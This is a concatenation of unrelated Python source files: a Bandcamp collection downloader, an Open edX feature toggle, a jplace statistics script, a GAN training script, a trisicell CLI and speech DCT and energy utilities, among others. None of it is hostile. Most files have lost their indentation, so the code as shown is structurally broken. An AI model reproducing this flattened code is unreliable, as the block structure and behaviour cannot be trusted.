kv = string.split('=', maxsplit=1)
if len(kv) == 1:
kv.append(None)
return kv
cookie_dict = dict([parse_cookie(cookie_comb)
for cookie_comb in cookie_string.split(';')])
bc = Bandcamp(cookies=cookie_dict)
after = None
if data['--after']:
after = datetime.strptime(data['--after'], '%Y-%m-%d')
if data['download-collection']:
if data['<target-directory>']:
bc.download_directory = data['<target-directory>']
await download_collection(bc, parallel=int(data['--parallel']), status_file=data['--status'],
file_format=data['--format'], after=after)
async def do_login(bc):
await bc.load_user_data()
if not bc.is_logged_in():
print(Fore.RED + "No user logged in with given cookies" + Fore.RESET)
exit(1)
print("{cg}Logged in as {cb}{bc.user[name]}{cg} ({cc}{bc.user[username]}{cg}){r}".format(
cy=Fore.YELLOW, cc=Fore.CYAN, cg=Fore.GREEN, cb=Fore.BLUE, r=Fore.RESET, bc=bc
))
def on_executor(func):
async def wrapper(*args, **kwargs):
return await asyncio.get_event_loop().run_in_executor(None, lambda: func(*args, **kwargs))
return wrapper
@on_executor
def read_file_in_memory(filename):
with open(filename, 'r') as fp:
return fp.read()
@on_executor
def write_contents_to_file(filename, data):
with open(filename, 'w') as fp:
fp.write(data)
async def download_collection(bc, parallel, status_file=None, file_format=None, after=None):
file_format = file_format.lower()
if file_format not in Bandcamp.FORMATS.keys():
print(Fore.RED + "Please use one of the following formats: " + Fore.CYAN
+ (Fore.RED + ', ' + Fore.CYAN).join(Bandcamp.FORMATS.keys()) + Fore.RESET)
exit(1)
await do_login(bc)
coll = await bc.load_own_collection(full=True)
working = 0
done = 0
failed = 0
failed_items = []
if status_file is not None:
if not isfile(status_file):
try:
with open(status_file, 'w') as fp:
fp.write('{}')
            except OSError:
print("Can't write status file (%s)" % status_file)
exit(1)
json_status = await read_file_in_memory(status_file)
status = json.loads(json_status)
else:
status = {}
queue = [item for item in coll.items.values()
if (item.id not in status or not status[item.id]) and (after is None or item.purchased is None or after < item.purchased)]
async def print_progress():
nonlocal working, done, failed
last_height = 0
step = 0
# But it looks sexy in the console!
while len(queue) > 0 or working > 0:
message = (ansi.clear_line() + ansi.Cursor.UP(1)) * last_height
message += '{clear}\r{cy}Queued: {cg}{nq}{cy} Working: {cg}{nw}' \
'{cy} Done: {cg}{nd}{cy} Failed: {cr}{nf}{r}\n\n'.format(
clear=ansi.clear_line(), cy=Fore.YELLOW,
cg=Fore.GREEN, cr=Fore.RED, r=Fore.RESET,
nq=len(queue), nw=working, nd=done, nf=failed)
for val in bc.download_status.values():
if val['status'] not in ('downloading', 'converting', 'requested'):
continue
message += Fore.YELLOW + '[' + Fore.BLUE
if val['status'] in ('converting', 'requested'):
bar = '.. .. ..'
message += bar[step:step + 4]
elif val['status'] == 'downloading':
message += "{:>4.0%}".format(val['downloaded_size'] / val['size'])
message += "{cy}] {cc}{v[item].name}{cy} by {cg}{v[item].artist}{r}\n".format(
cy=Fore.YELLOW, cc=Fore.CYAN, cg=Fore.GREEN, r=Fore.RESET, v=val
)
last_height = message.count("\n")
print(message, end="")
step = (step + 1) % 3
await asyncio.sleep(0.5)
async def write_status():
while len(queue) > 0 or working > 0:
json_data = json.dumps(status)
await write_contents_to_file(status_file, json_data)
await asyncio.sleep(5)
json_data = json.dumps(status)
await write_contents_to_file(status_file, json_data)
async def download_item(item):
nonlocal done, failed
res = await bc.download_item(item, file_format)
done += 1
if res is None:
failed += 1
failed_items.append(item)
else:
item_dict = item.as_dict()
del item_dict['download_url']
item_dict['file'] = res
item_dict['quality'] = file_format
status[item.id] = item_dict
async def queue_download():
nonlocal working
working += 1
while len(queue) > 0:
item = queue.pop()
await download_item(item)
working -= 1
downloaders = []
for i in range(min(len(queue), parallel)):
downloaders.append(queue_download())
progress_checkers = [print_progress()]
if status_file is not None:
progress_checkers.append(write_status())
await asyncio.gather(*downloaders, *progress_checkers)
if failed > 0:
print(Fore.YELLOW + '\nThe following items failed:')
for item in failed_items:
print("{cc}{i.name}{cy} by {cg}{i.artist}{cy}: {cb}{i.url}{r}".format(
cy=Fore.YELLOW, cc=Fore.CYAN, cg=Fore.GREEN, cb=Fore.BLUE, r=Fore.RESET, i=item,
))
print(Fore.GREEN + 'Done!' + Fore.RESET)
loop = asyncio.get_event_loop()
loop.run_until_complete(_main(data))
loop.close()
|
"""
Toggles for the Agreements app
"""
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.waffle_utils import CourseWaffleFlag
# .. toggle_name: agreements.enable_integrity_signature
# .. toggle_implementation: CourseWaffleFlag
# .. toggle_default: False
# .. toggle_description: Supports rollout of the integrity signature feature
# .. toggle_use_cases: temporary, open_edx
# .. toggle_creation_date: 2021-05-07
# .. toggle_target_removal_date: None
# .. toggle_warnings: None
# .. toggle_tickets: MST-786
ENABLE_INTEGRITY_SIGNATURE = CourseWaffleFlag( # lint-amnesty, pylint: disable=toggle-missing-annotation
'agreements', 'enable_integrity_signature', __name__,
)
def is_integrity_signature_enabled(course_key):
if isinstance(course_key, str):
course_key = CourseKey.from_string(course_key)
return ENABLE_INTEGRITY_SIGNATURE.is_enabled(course_key)
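# Usage sketch (the course id below is a made-up example):
#   if is_integrity_signature_enabled("course-v1:edX+DemoX+Demo_Course"):
#       ...  # enable the integrity signature flow for this course run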
|
#!/usr/bin/env python
import argparse
import logging
import csv
import json
import sys
import gzip
import bz2
import os
logging.basicConfig(
format='%(message)s',
level=logging.INFO)
log = logging.getLogger(__name__)
# Handle py2 and py3 file differences
if sys.version_info[0] == 3:
from io import IOBase
file = IOBase
def open_file(path):
if not os.path.exists(path):
log.error("%s does not exist", path)
return None
# Implicit else
suffix = path.split('.')[-1].lower().strip()
if suffix == 'gz':
return gzip.open(path, mode='rt')
elif suffix == 'bz2':
return bz2.BZ2File(path, mode='r')
else:
return open(path, mode='rt')
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'jplace',
metavar='XXX.jplace[.bz2|.gz]',
help='jplace file (default is standard in)',
nargs='?',
default=sys.stdin,
)
parser.add_argument(
'--csv',
metavar='XXX.csv',
help='CSV file with stats (default is standard out)',
nargs='?',
default=sys.stdout,
)
args = parser.parse_args()
if isinstance(args.csv, file):
csv_h = args.csv
else:
try:
csv_h = open(args.csv, mode='wt')
except Exception as e:
log.error("Failed to open %s for writing.", args.csv)
sys.exit(-1)
# Implicit else we were able to open the csv file
if isinstance(args.jplace, file):
jplace_h = args.jplace
else:
jplace_h = open_file(args.jplace)
if jplace_h is None:
log.error("Could not open jplace file. Exiting")
sys.exit(-1)
# Implicit else, parse the json from the file handle
try:
jplace = json.load(jplace_h)
jplace_h.close()
except Exception as e:
log.error("Failed to parse JSON with error {}".format(e))
sys.exit(-1)
    # Implicit else, we have something JSON can work with
try:
assert('fields' in jplace.keys()), "JSON Missing fields entry"
assert('placements' in jplace.keys()), "JSON Missing placements entry"
except AssertionError as e:
log.error("Malformed jplace, {}".format(e))
sys.exit(-1)
# Implicit else we have some data...
# Associate a field name with an index
field_idx = {
fn: i
for i, fn in enumerate(jplace['fields'])
}
log.info("There are %d placements", len(jplace['placements']))
writer = csv.writer(csv_h)
writer.writerow([
"seq_id",
"richness",
'min_distance'
])
for placement in jplace['placements']:
placement_sv = [s[0] for s in placement['nm']]
placement_dl = [pl[field_idx['distal_length']] for pl in placement['p']]
for sv in placement_sv:
writer.writerow([
sv,
len(placement_dl),
min(placement_dl),
])
csv_h.close()
sys.exit(0)
if __name__ == '__main__':
main()
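# Example invocation (file names are illustrative; the script name is assumed):
#   python jplace_stats.py placements.jplace.gz --csv placement_stats.csv
# This writes one CSV row per sequence variant with the number of placements
# (richness) and the minimum distal length across those placements.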
|
from numpy import random
import pytest
@pytest.fixture
def generator(request):
seed_string = request.node.nodeid
seed = [ord(character) for character in seed_string]
return random.default_rng(seed)
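# Usage sketch (assumption: this fixture lives in a conftest.py, so pytest
# injects it by name). Seeding from the test's nodeid gives every test its own
# deterministic random stream, which makes failures reproducible across runs.
def test_generator_is_seeded_per_test(generator):
    # drawing from the per-test generator yields a deterministic sample
    sample = generator.uniform(size=3)
    assert sample.shape == (3,)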
|
import tornado.web
from tornado.options import define, options
import tornado.ioloop
import os
from handlers import *
from storage import *
define("db_connstr", help="PostgreSQL connection string")
define("port", default="44321", help="Port for hosting service")
settings = {
"debug" : True,
"gzip" : True,
}
def main(host="0.0.0.0", port=44321):
ioloop = tornado.ioloop.IOLoop.instance()
s = Storage(ioloop, options.db_connstr, 1)
s.connect()
urls = [
(r'/indexpage', IndexHandler, dict(storage=s)),
(r'/article/(?P<link>[a-zA-Z0-9-_]+)', ArticleHandler, dict(storage=s)),
        (r'/articleinfos/(?P<tag>[a-zA-Z0-9-_]+)', ArticleInfoHandler, dict(storage=s))
]
app = tornado.web.Application(urls, **settings)
app.listen(port, host)
ioloop.start()
s.close()
if __name__ == "__main__":
tornado.options.parse_command_line()
main("0.0.0.0", options.port)
|
#!/usr/bin/env python3
#
# This is a small script that intercepts the build command, and
# applies it to multiple directories, in parallel.
#
import multiprocessing.dummy
import pathlib
import subprocess
import sys
sys.path.insert(0, "development-support")
import _install_tool
jobs = int(sys.argv[1])
cmd = sys.argv[2:]
dirs = ["pyobjc-core"] + _install_tool.sorted_framework_wrappers()
failed = []
def build(dirpath):
r = subprocess.run(
cmd,
cwd=dirpath,
check=dirpath == "pyobjc-core",
)
    # subprocess.run() returns a CompletedProcess, which is always truthy, so
    # check the return code to actually record failures
    if r.returncode != 0:
        failed.append(dirpath)
with multiprocessing.dummy.Pool(jobs) as p:
p.map(build, dirs)
print("FAILED:", *failed)
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from singa import device
from singa import opt
from singa import tensor
import argparse
import matplotlib.pyplot as plt
import numpy as np
import os
from model import gan_mlp
from utils import load_data
from utils import print_log
class VANILLA():
def __init__(self,
dev,
rows=28,
cols=28,
channels=1,
noise_size=100,
hidden_size=128,
batch=128,
interval=1000,
learning_rate=0.001,
iterations=1000000,
dataset_filepath='mnist.pkl.gz',
file_dir='vanilla_images/'):
self.dev = dev
self.rows = rows
self.cols = cols
self.channels = channels
self.feature_size = self.rows * self.cols * self.channels
self.noise_size = noise_size
self.hidden_size = hidden_size
self.batch = batch
self.batch_size = self.batch // 2
self.interval = interval
self.learning_rate = learning_rate
self.iterations = iterations
self.dataset_filepath = dataset_filepath
self.file_dir = file_dir
self.model = gan_mlp.create_model(noise_size=self.noise_size,
feature_size=self.feature_size,
hidden_size=self.hidden_size)
def train(self):
train_data, _, _, _, _, _ = load_data(self.dataset_filepath)
dev = device.create_cuda_gpu_on(0)
dev.SetRandSeed(0)
np.random.seed(0)
# sgd = opt.SGD(lr=self.learning_rate, momentum=0.9, weight_decay=1e-5)
sgd = opt.Adam(lr=self.learning_rate)
noise = tensor.Tensor((self.batch_size, self.noise_size), dev,
tensor.float32)
real_images = tensor.Tensor((self.batch_size, self.feature_size), dev,
tensor.float32)
real_labels = tensor.Tensor((self.batch_size, 1), dev, tensor.float32)
fake_labels = tensor.Tensor((self.batch_size, 1), dev, tensor.float32)
# attached model to graph
self.model.set_optimizer(sgd)
self.model.compile([noise],
is_train=True,
use_graph=False,
sequential=True)
real_labels.set_value(1.0)
fake_labels.set_value(0.0)
for iteration in range(self.iterations):
idx = np.random.randint(0, train_data.shape[0], self.batch_size)
real_images.copy_from_numpy(train_data[idx])
self.model.train()
# Training the Discriminative Net
_, d_loss_real = self.model.train_one_batch_dis(
real_images, real_labels)
noise.uniform(-1, 1)
fake_images = self.model.forward_gen(noise)
_, d_loss_fake = self.model.train_one_batch_dis(
fake_images, fake_labels)
d_loss = tensor.to_numpy(d_loss_real)[0] + tensor.to_numpy(
d_loss_fake)[0]
# Training the Generative Net
noise.uniform(-1, 1)
_, g_loss_tensor = self.model.train_one_batch(
noise, real_labels)
g_loss = tensor.to_numpy(g_loss_tensor)[0]
if iteration % self.interval == 0:
self.model.eval()
self.save_image(iteration)
print_log(' The {} iteration, G_LOSS: {}, D_LOSS: {}'.format(
iteration, g_loss, d_loss))
def save_image(self, iteration):
demo_row = 5
demo_col = 5
if not hasattr(self, "demo_noise"):
            self.demo_noise = tensor.Tensor(
                (demo_col * demo_row, self.noise_size), self.dev, tensor.float32)
self.demo_noise.uniform(-1, 1)
gen_imgs = self.model.forward_gen(self.demo_noise)
gen_imgs = tensor.to_numpy(gen_imgs)
show_imgs = np.reshape(
gen_imgs, (gen_imgs.shape[0], self.rows, self.cols, self.channels))
fig, axs = plt.subplots(demo_row, demo_col)
cnt = 0
for r in range(demo_row):
for c in range(demo_col):
axs[r, c].imshow(show_imgs[cnt, :, :, 0], cmap='gray')
axs[r, c].axis('off')
cnt += 1
fig.savefig("{}{}.png".format(self.file_dir, iteration))
plt.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Train GAN over MNIST')
parser.add_argument('filepath', type=str, help='the dataset path')
parser.add_argument('--use_gpu', action='store_true')
args = parser.parse_args()
if args.use_gpu:
print('Using GPU')
dev = device.create_cuda_gpu()
else:
print('Using CPU')
dev = device.get_default_device()
if not os.path.exists('vanilla_images/'):
os.makedirs('vanilla_images/')
rows = 28
cols = 28
channels = 1
noise_size = 100
hidden_size = 128
batch = 128
interval = 1000
learning_rate = 0.0005
iterations = 1000000
dataset_filepath = 'mnist.pkl.gz'
file_dir = 'vanilla_images/'
vanilla = VANILLA(dev, rows, cols, channels, noise_size, hidden_size, batch,
interval, learning_rate, iterations, dataset_filepath,
file_dir)
vanilla.train()
|
from collections import Counter
class Solution:
def numSplits(self, s: str) -> int:
left = Counter()
right = Counter(s)
count = 0
for i in range(len(s)):
left[s[i]] += 1
right[s[i]] -= 1
if right[s[i]] == 0:
del right[s[i]]
if len(left) == len(right):
count += 1
return count
s = "aacaba"
res = Solution().numSplits(s)
print(res)
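# For s = "aacaba" the printed result is 2: the splits "aac|aba" and "aaca|ba"
# each have two distinct letters on both sides. Every index is visited once, so
# the runtime is O(n) with O(1) extra space for a bounded alphabet.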
|
from collections import OrderedDict
import click
import trisicell as tsc
from trisicell.commands._bnb import bnb
from trisicell.commands._booster import booster
from trisicell.commands._consensus import consensus
from trisicell.commands._grmt import grmt
from trisicell.commands._huntress import huntress
from trisicell.commands._mcalling import mcalling
from trisicell.commands._partf import partf
from trisicell.commands._phiscs import phiscsb, phiscsi
from trisicell.commands._scistree import scistree
from trisicell.commands._scite import scite
from trisicell.commands._score import score
from trisicell.commands._search import search
from trisicell.commands._sphyr import sphyr
from trisicell.commands._trees import cf2newick, cf2tree
class NaturalOrderGroup(click.Group):
"""Command group trying to list subcommands in the order they were added.
Make sure you initialize the `self.commands` with OrderedDict instance.
With decorator, use::
@click.group(cls=NaturalOrderGroup, commands=OrderedDict())
"""
def list_commands(self, ctx):
"""List command names as they are in commands dict.
If the dict is OrderedDict, it will preserve the order commands
were added.
"""
return self.commands.keys()
# def citation(ctx, param, value):
# print("Please check https://trisicell.readthedocs.io/citing.html")
# ctx.exit(0)
@click.version_option(version=tsc.__version__)
# @click.option("--cite", is_flag=True, callback=citation, help="Show citation bib.")
@click.group(
cls=NaturalOrderGroup,
commands=OrderedDict(),
context_settings={"max_content_width": 300, "terminal_width": 300},
)
def cli():
"""Trisicell.
Scalable intratumor heterogeneity inference and validation from single-cell data.
"""
return None
cli.add_command(mcalling)
cli.add_command(booster)
cli.add_command(partf)
cli.add_command(phiscsb)
cli.add_command(phiscsi)
cli.add_command(scite)
cli.add_command(scistree)
cli.add_command(bnb)
cli.add_command(huntress)
cli.add_command(grmt)
cli.add_command(sphyr)
cli.add_command(cf2newick)
cli.add_command(cf2tree)
cli.add_command(score)
cli.add_command(consensus)
cli.add_command(search)
|
import scipy.io.wavfile as sio
import scipy.signal as sis
from scipy import interpolate
import numpy as np
import math
import matplotlib.pyplot as plt
import mylib as myl
import sys
import copy as cp
import re
import scipy.fftpack as sf
# NOTE: int2float might be removed after scipy update/check
# (check defaults in myl.sig_preproc)
# read wav file
# IN:
# fileName
# OUT:
# signal ndarray
# sampleRate
def wavread(f,opt={'do_preproc':True}):
## signal input
fs, s_in = sio.read(f)
# int -> float
s = myl.wav_int2float(s_in)
# preproc
if opt['do_preproc']:
s = myl.sig_preproc(s)
return s, fs
# DCT
# IN:
# y - 1D signal vector
# opt
# ['fs'] - sample rate
# ['wintyp'] - <'kaiser'>, any type supported by
# scipy.signal.get_window()
# ['winparam'] - <1> additionally needed window parameters,
# scalar, string, list ..., depends on 'wintyp'
# ['nsm'] - <3> number of spectral moments
# ['rmo'] - skip first (lowest) cosine (=constant offset)
# in spectral moment calculation <1>|0
# ['lb'] - lower cutoff frequency for coef truncation <0>
# ['ub'] - upper cutoff frequency (if 0, no cutoff) <0>
# Recommended e.g. for f0 DCT, so that only influence
# of events with <= 10Hz on f0 contour is considered)
#   ['peak_prct'] - <80> lower percentile threshold to be exceeded by
#                   amplitude maxima in the DCT spectrum
# OUT:
# dct
# ['c_orig'] all coefs
# ['f_orig'] their frequencies
# ['c'] coefs with freq between lb and ub
# ['f'] their freqs
# ['i'] their indices in c_orig
# ['sm'] spectral moments based on c
# ['opt'] input options
# ['m'] y mean
# ['sd'] y standard dev
# ['cbin'] array of sum(abs(coef)) in frequency bins
# ['fbin'] corresponding lower boundary freqs
# ['f_max'] frequency of global amplitude maximum
# ['f_lmax'] frequencies of local maxima (array of minlen 1)
# ['c_cog'] the coef amplitude of the cog freq (sm[0])
# PROBLEMS:
# - if segment is too short (< 5 samples) lowest freqs associated to
# DCT components are too high for ub, that is dct_trunc() returns
# empty array.
# -> np.nan assigned to respective variables
def dct_wrapper(y,opt):
dflt={'wintyp':'kaiser','winparam':1,'nsm':3,'rmo':True,
'lb':0,'ub':0,'peak_prct':80}
opt = myl.opt_default(opt,dflt)
# weight window
w = sig_window(opt['wintyp'],len(y),opt['winparam'])
y = y*w
#print(1,len(y))
# centralize
y = y-np.mean(y)
#print(2,len(y))
# DCT coefs
c = sf.dct(y,norm='ortho')
#print(3,len(c))
# indices (starting with 0)
ly = len(y)
ci = myl.idx_a(ly)
# corresponding cos frequencies
    f = (ci+1) * (opt['fs']/(ly*2))
# band pass truncation of coefs
# indices of coefs with lb <= freq <= ub
i = dct_trunc(f,ci,opt)
#print('f ci i',f,ci,i)
# analysis segment too short -> DCT freqs above ub
if len(i)==0:
sm = myl.ea()
while len(sm) <= opt['nsm']:
sm = np.append(sm,np.nan)
return {'c_orig':c,'f_orig':f,'c':myl.ea(),'f':myl.ea(),'i':[],'sm':sm,'opt':opt,
'm':np.nan,'sd':np.nan,'cbin':myl.ea(),'fbin':myl.ea(),
'f_max':np.nan, 'f_lmax':myl.ea(), 'c_cog': np.nan}
# mean abs error from band-limited IDCT
#mae = dct_mae(c,i,y)
# remove constant offset with index 0
# already removed by dct_trunc in case lb>0. Thus checked for i[0]==0
# (i[0] indeed represents constant offset; tested by
# cr = np.zeros(ly); cr[0]=c[0]; yr = sf.idct(cr); print(yr)
if opt['rmo']==True and len(i)>1 and i[0]==0:
j = i[1:len(i)]
else:
j = i
if type(j) is not list: j = [j]
# coefs and their frequencies between lb and ub
# (+ constant offset removed)
fi = f[j]
ci = c[j]
# spectral moments
if len(j)>0:
sm = specmom(ci,fi,opt['nsm'])
else:
sm = np.zeros(opt['nsm'])
# frequency bins
fbin, cbin = dct_fbin(fi,ci,opt)
# frequencies of global and local maxima in DCT spectrum
f_max, f_lmax, px = dct_peak(ci,fi,sm[0],opt)
# return
return {'c_orig':c,'f_orig':f,'c':ci,'f':fi,'i':j,'sm':sm,'opt':opt,
'm':np.mean(y),'sd':np.std(y),'cbin':cbin,'fbin':fbin,
'f_max':f_max, 'f_lmax':f_lmax, 'c_cog': px}
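# Usage sketch for dct_wrapper() (values are illustrative): analyse an f0
# contour y sampled at 100 Hz and keep only components up to 10 Hz:
#   d = dct_wrapper(y, {'fs': 100, 'lb': 0, 'ub': 10})
#   d['sm']     # spectral moments of the band-limited spectrum
#   d['f_max']  # frequency of the global amplitude maximum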
# returns local and max peak frequencies
# IN:
# x: array of abs coef amplitudes
# f: corresponding frequencies
# cog: center of gravity
# OUT:
#   f_gm: freq of global maximum
# f_lm: array of freq of local maxima
#   px: threshold to be exceeded (derived from prct specs)
def dct_peak(x,f,cog,opt):
x = abs(cp.deepcopy(x))
## global maximum
i = myl.find(x,'is','max')
if len(i)>1:
i=int(np.mean(i))
f_gm = float(f[i])
## local maxima
    # threshold to be exceeded
px = dct_px(x,f,cog,opt)
idx = myl.find(x,'>=',px)
# 2d array of neighboring+1 indices
# e.g. [[0,1,2],[5,6],[9,10]]
ii = []
# min freq distance between maxima
fd_min = 1
for i in myl.idx(idx):
if len(ii)==0:
ii.append([idx[i]])
elif idx[i]>ii[-1][-1]+1:
xi = x[ii[-1]]
fi = f[ii[-1]]
j = myl.find(xi,'is','max')
#print('xi',xi,'fi',fi,'f',f[idx[i]])
if len(j)>0 and f[idx[i]]>fi[j[0]]+fd_min:
#print('->1')
ii.append([idx[i]])
else:
#print('->2')
ii[-1].append(idx[i])
#myl.stopgo() #!c
else:
ii[-1].append(idx[i])
# get index of x maximum within each subsegment
# and return corresponding frequencies
f_lm = []
for si in ii:
zi = myl.find(x[si],'is','max')
if len(zi)>1:
zi=int(np.mean(zi))
else:
zi = zi[0]
i = si[zi]
if not np.isnan(i):
f_lm.append(f[i])
#print('px',px)
#print('i',ii)
#print('x',x)
#print('f',f)
#print('m',f_gm,f_lm)
#myl.stopgo()
return f_gm, f_lm, px
# return center-of-gravity related amplitude
# IN:
# x: array of coefs
# f: corresponding freqs
# cog: center of gravity freq
# opt
# OUT:
# coef amplitude related to cog
def dct_px(x,f,cog,opt):
x = abs(cp.deepcopy(x))
# cog outside freq range
if cog <= f[0]:
return x[0]
elif cog >= f[-1]:
return x[-1]
# find f-indices adjacent to cog
for i in range(len(f)-1):
if f[i] == cog:
return x[i]
elif f[i+1] == cog:
return x[i+1]
elif f[i] < cog and f[i+1] > cog:
# interpolate
#xi = np.interp(cog,f[i:i+2],x[i:i+2])
#print('cog:',cog,'xi',f[i:i+2],x[i:i+2],'->',xi)
return np.interp(cog,f[i:i+2],x[i:i+2])
return np.percentile(x,opt['peak_prct'])
# pre-emphasis
# alpha > 1 (interpreted as lower cutoff freq)
# alpha <- exp(-2 pi alpha delta)
# s'[n] = s[n]-alpha*s[n-1]
# IN:
# signal
# alpha - s[n-1] weight <0.95>
# fs - sample rate <-1>
#   do_scale - <FALSE> if TRUE then the pre-emphasized signal is scaled to
# same abs_mean value as original signal (in general pre-emphasis
# leads to overall energy loss)
def pre_emphasis(y,a=0.95,fs=-1,do_scale=False):
# determining alpha directly or from cutoff freq
if a>1:
if fs <= 0:
            print('pre_emphasis: sample rate fs is needed to derive alpha from the cutoff frequency. Set to 0.95')
a = 0.95
else:
a = math.exp(-2*math.pi*a*1/fs)
#print('alpha',a)
# shifted signal
ype = np.append(y[0], y[1:] - a * y[:-1])
# scaling
if do_scale:
sf = np.mean(abs(y))/np.mean(abs(ype))
ype*=sf
## plot
#ys = y[30000:40000]
#ypes = ype[30000:40000]
#t = np.linspace(0,len(ys),len(ys))
#fig, spl = plt.subplots(2,1,squeeze=False)
#cid1 = fig.canvas.mpl_connect('button_press_event', onclick_next)
#cid2 = fig.canvas.mpl_connect('key_press_event', onclick_exit)
#spl[0,0].plot(t,ys)
#spl[1,0].plot(t,ypes)
#plt.show()
##
return ype
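# Usage sketch (values are illustrative): an alpha > 1 is read as a lower
# cutoff frequency and converted internally to alpha = exp(-2*pi*a/fs):
#   ype = pre_emphasis(y, a=50, fs=16000)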
# frequency bins: symmetric 2-Hz windows around freq integers
# in bandpass overlapped by 1 Hz
# IN:
# f - ndarray frequencies
# c - ndarray coefs
# opt['lb'] - lower and upper truncation freqs
# ['ub']
# OUT:
# fbin - ndarray, lower bnd of freq bins
# cbin - ndarray, summed abs coef values in these bins
def dct_fbin(f,c,opt):
fb = myl.idx_seg(math.floor(opt['lb']),math.ceil(opt['ub']))
cbin = np.zeros(len(fb)-1);
for j in myl.idx_a(len(fb)-1):
k = myl.intersect(myl.find(f,'>=',fb[j]),
myl.find(f,'<=',fb[j+1]))
cbin[j] = sum(abs(c[k]))
fbin = fb[myl.idx_a(len(fb)-1)]
return fbin, cbin
# spectral moments
# IN:
# c - ndarray, coefficients
# f - ndarray, related frequencies <1:len(c)>
# n - number of spectral moments <3>
# OUT:
# m - ndarray moments (increasing)
def specmom(c,f=[],n=3):
if len(f)==0:
f = myl.idx_a(len(c))+1
c = abs(c)
s = sum(c)
k=0;
m = np.asarray([])
for i in myl.idx_seg(1,n):
m = myl.push(m, sum(c*((f-k)**i))/s)
k = m[-1]
return m
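# Worked example (illustrative; assumes myl.idx_seg(1, n) yields 1..n and
# myl.push appends):
#   specmom(np.array([1.0, 2.0, 1.0]), np.array([1.0, 2.0, 3.0]), n=2)
# returns approximately [2.0, 0.5]: a spectral centre of gravity of 2 and a
# variance of 0.5 around it.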
# wrapper around IDCT
# IN:
# c - coef vector derived by dct
# i - indices of coefs to be taken for IDCT; if empty (default),
# all coefs taken)
# OUT:
# y - IDCT result
def idct_bp(c,i=myl.ea()):
if len(i)==0:
return sf.idct(c,norm='ortho')
cr = np.zeros(len(c))
cr[i]=c[i]
return sf.idct(cr)
# mean abs error from IDCT
def dct_mae(c,i,y):
cr = np.zeros(len(c))
cr[i]=c[i]
yr = sf.idct(cr)
return myl.mae(yr,y)
# indices to truncate DCT output to freq band
# IN:
# f - ndarray, all frequencies
# ci - all indices of coef ndarray
# opt['lb'] - lower cutoff freq
# ['ub'] - upper cutoff freq
# OUT:
# i - ndarray, indices in F of elements to be kept
def dct_trunc(f,ci,opt):
if opt['lb']>0:
ihp = myl.find(f,'>=',opt['lb'])
else:
ihp = ci
if opt['ub']>0:
ilp = myl.find(f,'<=',opt['ub'])
else:
ilp = ci
return myl.intersect(ihp,ilp)
# wrapper around wavread and energy calculation
# IN:
# f: wavFileName (any number of channels) or array containing
# the signal (any number of channels=columns)
# opt: energy extraction and postprocessing
# .win, .wintyp, .winparam: window parameters
# .sts: stepsize for energy contour
# .do_preproc: centralizing signal
# .do_out: remove outliers
# .do_interp: linear interpolation over silence
# .do_smooth: smoothing (median or savitzky golay)
# .out dict; see pp_outl()
# .smooth dict; see pp_smooth()
# fs: <-1> needed if f is array
# OUT:
# y: time + energy contour 2-dim np.array
# (1st column: time, other columns: energy)
def wrapper_energy(f,opt = {}, fs = -1):
opt = myl.opt_default(opt,{'wintyp':'hamming',
'winparam':'',
'sts':0.01,
'win':0.05,
'do_preproc': True,
'do_out': False,
'do_interp': False,
'do_smooth': False,
'out': {},
'smooth': {}})
opt['out'] = myl.opt_default(opt['out'], {'f': 3,
'm': 'mean'})
opt['smooth'] = myl.opt_default(opt['smooth'],{"mtd": "sgolay",
"win": 7,
"ord": 3})
if type(f) is str:
s, fs = wavread(f,opt)
else:
if fs < 0:
sys.exit("array input requires sample rate fs. Exit.")
s = f
opt['fs']=fs
# convert to 2-dim array; each column represents a channel
if np.ndim(s)==1:
s = np.expand_dims(s, axis=1)
# output (.T-ed later, reserve first list for time)
y = myl.ea()
# over channels
for i in np.arange(0,s.shape[1]):
e = sig_energy(s[:,i],opt)
# setting outlier to 0
if opt['do_out']:
e = pp_outl(e,opt['out'])
# interpolation over 0
if opt['do_interp']:
e = pp_interp(e)
# smoothing
if opt['do_smooth']:
e = pp_smooth(e,opt['smooth'])
# <0 -> 0
e[myl.find(e,'<',0)]=0
y = myl.push(y,e)
# output
if np.ndim(y)==1:
y = np.expand_dims(y, axis=1)
else:
y = y.T
# concat time as 1st column
sts = opt['sts']
t = np.arange(0,sts*y.shape[0],sts)
if len(t) != y.shape[0]:
while len(t) > y.shape[0]:
t = t[0:len(t)-1]
while len(t) < y.shape[0]:
t = np.append(t,t[-1]+sts)
t = np.expand_dims(t, axis=1)
y = np.concatenate((t,y),axis=1)
return y
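# Usage sketch for wrapper_energy() (file name is illustrative):
#   y = wrapper_energy('audio.wav', {'do_interp': True, 'do_smooth': True})
#   # y[:, 0] holds time stamps in seconds, y[:, 1:] one energy contour per channel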
### replacing outliers by 0 ###################
def pp_outl(y,opt):
if "m" not in opt:
return y
# ignore zeros
opt['zi'] = True
io = myl.outl_idx(y,opt)
if np.size(io)>0:
y[io] = 0
return y
### interpolation over 0 (+constant extrapolation) #############
def pp_interp(y,opt={}):
xi = myl.find(y,'==',0)
xp = myl.find(y,'>',0)
yp = y[xp]
if "kind" in opt:
f = interpolate.interp1d(xp,yp,kind=opt["kind"],
fill_value=(yp[0],yp[-1]))
yi = f(xi)
else:
yi = np.interp(xi,xp,yp)
y[xi]=yi
return y
#!check
### smoothing ########################################
# remark: savgol_filter() causes warning
# Using a non-tuple sequence for multidimensional indexing is deprecated
# will be out with scipy.signal 1.2.0
# (https://github.com/scipy/scipy/issues/9086)
def pp_smooth(y,opt):
if opt['mtd']=='sgolay':
if len(y) <= opt['win']:
return y
y = sis.savgol_filter(y,opt['win'],opt['ord'])
elif opt['mtd']=='med':
y = sis.medfilt(y,opt['win'])
return y
# calculates energy contour from acoustic signal
# do_preproc per default False. If not yet preprocessed by myl.sig_preproc()
# set to True
# IN:
# x ndarray signal
# opt['fs'] - sample frequency
# ['wintyp'] - <'hamming'>, any type supported by
# scipy.signal.get_window()
# ['winparam'] - <''> additionally needed window parameters,
